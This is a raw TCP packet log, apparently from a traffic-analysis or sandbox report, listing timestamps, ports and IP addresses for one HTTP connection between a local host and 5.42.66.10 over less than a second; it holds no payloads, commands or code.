May 6, 2024 07:53:08.699794054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699799061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699810982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699820995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699821949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699834108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699839115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699846029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699856997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699867010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699870110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699883938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699892998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699902058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699904919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699915886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699927092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699939013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699942112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699950933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699964046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699965000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699975967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699989080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700002909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700015068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700022936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700027943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700040102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700052023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700054884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700062990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700067997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700074911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700086117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700086117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700097084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700098038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700119972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700131893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700138092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700144053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700144053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700166941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700189114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700205088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700242996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700309992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700321913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700333118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700345993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700347900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700356960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700357914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700370073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700377941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700396061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700402021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700413942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700416088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700424910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700442076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700464010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700551987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700563908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700576067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700587988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700592995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700599909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700612068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700614929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700623989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700634003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700639009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700647116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700651884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700659037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700680971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700690985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700700045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700701952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700712919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700725079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700726032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700737953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700757027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700762033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700768948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700771093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700781107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700793028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700794935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700803995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700814962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700824022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700825930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700856924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700856924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700858116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700870991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700881958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700887918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700898886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700898886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700911045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700911999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700922966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700933933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700936079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700946093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700954914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700958014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700963974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700969934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700980902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.700990915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.700993061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701004028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701009035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701016903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701029062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701037884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701061964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701083899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701144934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701157093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701195955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701267958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701278925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701288939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701303005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701313972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701313972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701325893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701327085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701339960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701349974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701353073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701363087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701376915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701389074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701396942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701409101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701415062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701421022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701431990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701436996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701442957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701448917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701455116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701467037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701477051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701478958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701493025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701502085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701504946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701514959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701523066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701529026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701546907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701549053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701561928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701570034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701572895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701585054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701587915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701596022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701610088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701628923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701632977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701641083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701652050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701664925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701673985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701677084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701687098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701690912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701703072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701713085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701714039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701735973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701746941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701765060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701776981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701786995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701797962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701808929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701809883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701821089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701832056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701833963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701845884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701853991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701858044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701869965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701875925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701881886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701893091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.701894045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701910973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701932907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.701988935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702002048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702013016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702024937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702035904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702037096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702045918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702049971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702059031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702070951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702075958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702081919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702092886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702097893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702111959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702116013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702127934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702136040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702138901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702152014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702157021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702162981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702173948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702178955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702186108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702198029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702203989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702209949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702210903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702220917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702234030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702241898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702244043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702258110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702265978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702270031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702277899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702284098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702296019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702301025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702307940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702313900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702322006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702334881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702336073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702354908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702358007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702368975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702373981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702383041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702394009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702397108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702406883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702409983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702419043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702430964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702450991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702455044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702462912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702475071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702486038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702497005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702505112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702508926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702521086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702522993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702532053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702534914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702544928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702558041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702569008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702575922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702575922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702589035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702611923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702637911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702650070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702660084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702673912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702687025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702689886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702694893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702699900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702706099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702708006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702717066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702723026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702730894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702740908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702754021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702761889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702764988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702776909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702784061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702790976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702804089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702805996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702812910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702815056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702831030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702837944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702850103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702852964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702878952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702924013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702935934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702945948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702958107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702966928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702970028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702981949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.702990055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.702992916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703011036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703031063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703139067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703150034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703161001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703171968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703181982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703190088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703206062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703207016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703218937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703222990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703222990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703231096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703243971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703248024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703255892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703260899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703268051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703278065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703289032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703286886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703299999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703305006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703316927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703325987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703329086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703335047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703341961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703352928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703356028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.703373909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703398943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.703403950 CEST	80	49741	5.42.66.10	192.168.2.4
